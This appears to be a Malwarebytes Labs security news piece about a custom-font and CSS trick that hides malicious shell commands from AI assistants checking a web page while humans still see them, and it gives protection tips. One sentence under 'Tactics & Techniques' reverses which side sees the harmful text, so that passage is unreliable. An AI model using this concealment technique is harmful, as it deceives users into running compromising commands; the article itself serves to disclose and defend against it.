AI Security - Researchers Expose Font Trick for Malicious Commands
Basically, researchers found a way to hide bad commands from AI assistants using special fonts.
Researchers have found a way to trick AI assistants into missing malicious commands. This vulnerability poses risks for users relying on AI for security checks. Major platforms have been alerted but responses have been inadequate. Stay vigilant and verify commands before execution.
What Happened
Researchers have discovered a proof-of-concept (PoC) that exploits custom fonts to deceive popular AI assistants like ChatGPT and Google’s Gemini. This method allows malicious users to hide dangerous instructions within web pages, making them invisible to AI while still visible to human users. Imagine reading a book where some words are written in invisible ink; humans can see the hidden message, while AI can only see the visible text.
The implications are alarming. If a user asks an AI assistant if a command on a suspicious webpage is safe, the AI may respond positively, unaware of the hidden malicious instructions. This could lead to the execution of harmful commands that compromise the user's device, all while the AI remains oblivious to the danger.
Who's Affected
This vulnerability affects users of popular AI assistants that rely on web content for decision-making. With the increasing integration of AI in everyday tasks, many individuals may unwittingly become victims of this attack. The major AI platforms, including Microsoft and Google, have been informed of this vulnerability. However, their responses have been disappointing, with many providers dismissing the report as outside their security scope.
Only Microsoft and Google showed initial interest in addressing the issue, but even Google later downplayed the severity, closing the report without action. This leaves users exposed to potential attacks that exploit this vulnerability.
Tactics & Techniques
The attack combines custom fonts with Cascading Style Sheets (CSS) to create a deceptive display. While users see harmless text, the AI's reading of the underlying HTML reveals a different, more dangerous message. This tactic relies heavily on social engineering, as attackers count on users to trust their AI assistants without verifying the commands themselves.
To illustrate, a malicious webpage might instruct a user to execute a command that could lead to a system compromise. If the AI assistant checks the page, it may only see the harmless version and mislead the user into thinking it's safe. This highlights the critical need for users to remain vigilant and not solely rely on AI for security assessments.
How to Protect Yourself
To safeguard against this type of attack, users should take proactive measures. Here are some essential tips:
- Copy and paste the exact command you plan to run, rather than relying on the AI's interpretation of a webpage.
- Be cautious with any site that prompts you to execute commands, especially in terminal environments.
- Trust your instincts; if something feels off, it’s better to pause and reassess.
Additionally, tools like the Malwarebytes Browser Guard can help by warning users if a website attempts to manipulate clipboard content. Keeping an up-to-date anti-malware solution will also provide protection against known malicious sites. If in doubt, consult tools like Malwarebytes Scam Guard to verify the legitimacy of suspicious websites.
Malwarebytes Labs